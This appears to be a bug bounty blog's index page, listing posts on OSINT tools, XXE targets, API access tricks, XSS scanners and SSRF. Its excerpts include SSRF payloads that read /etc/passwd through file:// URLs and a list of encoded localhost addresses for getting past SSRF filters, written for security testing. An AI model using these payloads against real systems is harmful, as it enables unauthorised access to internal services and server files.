Awasome OSINT Tools

November 23, 2021 localghost 0

There are many various OSINT tools in the market. But some of them are uncommon. Here are some open source intelligence tools which are really […]

XSS SSRF CRLF CSV-Injection Command Injection LFI Open-Redirect RCE Crypto Template Injection XSLT Content Injection LDAP Injection NoSQL Injection CSRF Injection GraphQL Injection IDOR ISCM LaTex Injection OAuth XPATH Injection Bypass Upload Tricky

Complete Bug Bounty Cheat Sheet

October 30, 2021 localghost 0

Everthing about Bug Bounty you need to know is here. XSS•• SQLi• SSRF•• CRLF• • CSV-Injection•• Command Injection• Traversal• […]

XXE Dorks,XXE vuln


October 2, 2021 localghost 0

Find XXE Vulnerability, XXE Dorks 1-Functionality that parses SVG files 2-Functionality that parses sitemap.xml files 3-SAML Authentication 4-HTML parsing 5-SOAP APIs 6-XML APIs Good Lock#bugbounty […]

SSRF exploitation via URL Scheme

October 2, 2021 localghost 0

SSRF exploitation via URL Scheme 1-File:Allows an attacker to fetch the content of a file on the server file://path/to/filefile:///etc/passwdfile://\/\/etc/passwdssrf.php?url=file:///etc/passwd 2-HTTP:Allows an attacker to fetch any […]

API #Bugbounty Tips

September 21, 2021 localghost 0

When you found API endpoint like “/api/v12/somthing” add “internal” to the route and check the respons. Example: Request:/api/v12/users/<userID> Respons: 403 Request: “/api/v12/internal/users/<userID>Respons: 200 After this […]


List of Tools to Detect XSS Vulnerabilities

September 5, 2021 localghost 0

XSSerW3afProbelyPower fuzzerBurp SuiteNetsparkerZAProxyWebScarabXSStrikeXSScrapywfuzzImmuniWeb On-demandnmapJMeterwapitiZAP-CLIArachniXSS HunterFirebugxsssniperSkipfishKNOXSSAcunetixPsalm Plus:Also you will need #bugbountytips #xss


SSRF Bypass List For Localhost (

March 2, 2021 localghost 0

http://127.1/ http://0000::1:80/ http://[::]:80/ http://2130706433/ http://whitelisted@ http://0x7f000001/ http://017700000001 http://0177.00.00.01 http://⑯⑨。②⑤④。⑯⑨。②⑤④/ http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/ http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/ http://②⑧⑤②⓪③⑨①⑥⑥:80/ http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/ http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/ http://0xd8.0x3a.0xd6.0xe3 Good luck!